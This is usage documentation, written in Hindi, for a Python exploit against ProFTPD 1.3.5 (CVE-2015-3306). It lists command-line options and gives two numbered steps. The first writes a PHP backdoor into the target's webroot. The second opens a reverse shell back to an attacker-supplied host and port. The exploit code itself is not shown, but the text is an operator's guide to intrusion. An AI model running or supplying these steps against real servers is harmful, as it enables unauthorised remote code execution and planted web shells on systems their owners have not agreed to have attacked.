
ProFTPD 1.3.5 CVE-2015-3306 के लिए शोषण जो लक्ष्य वेबरूट में PHP बैकडोर लिखता है और रिमोट कोड निष्पादन के लिए रिवर्स शेल उत्पन्न करता है।
ProFTPd 1.3.5 RCE
उपयोग: ProFTPD.py [options]
विकल्प:
-h, --help यह सहायता संदेश दिखाएँ और बाहर निकलें,
-l LHOST, --lhost=LHOST
रिवर्स शेल के लिए स्थानीय IP आवश्यक,
-p LPORT, --lport=LPORT
रिवर्स शेल के लिए पोर्ट आवश्यक,
-t TARGET, --target=TARGET
कमजोर लक्ष्य,
-d DIRECTORY, --dir=DIRECTORY
बैकडोर अपलोड करने के लिए वेबरूट डायरेक्टरी, डिफ़ॉल्ट: /var/www/html
-c COMMAND, --command=COMMAND
सिस्टम कमांड,
-f FILE, --file=FILE
बैकडोर का नाम, डिफ़ॉल्ट: shell.php.
चरण 1 - लक्ष्य मशीन पर बैकडोर लिखें!
उपयोग: python3 exploit.py -t 10.x.x.x -f cmd.php -d '/var/www/html'
चरण 2 - शेल प्राप्त करें!!
उपयोग: python3 exploit.py -t 10.x.x.x --lhost 172.x.x.x --lport 4242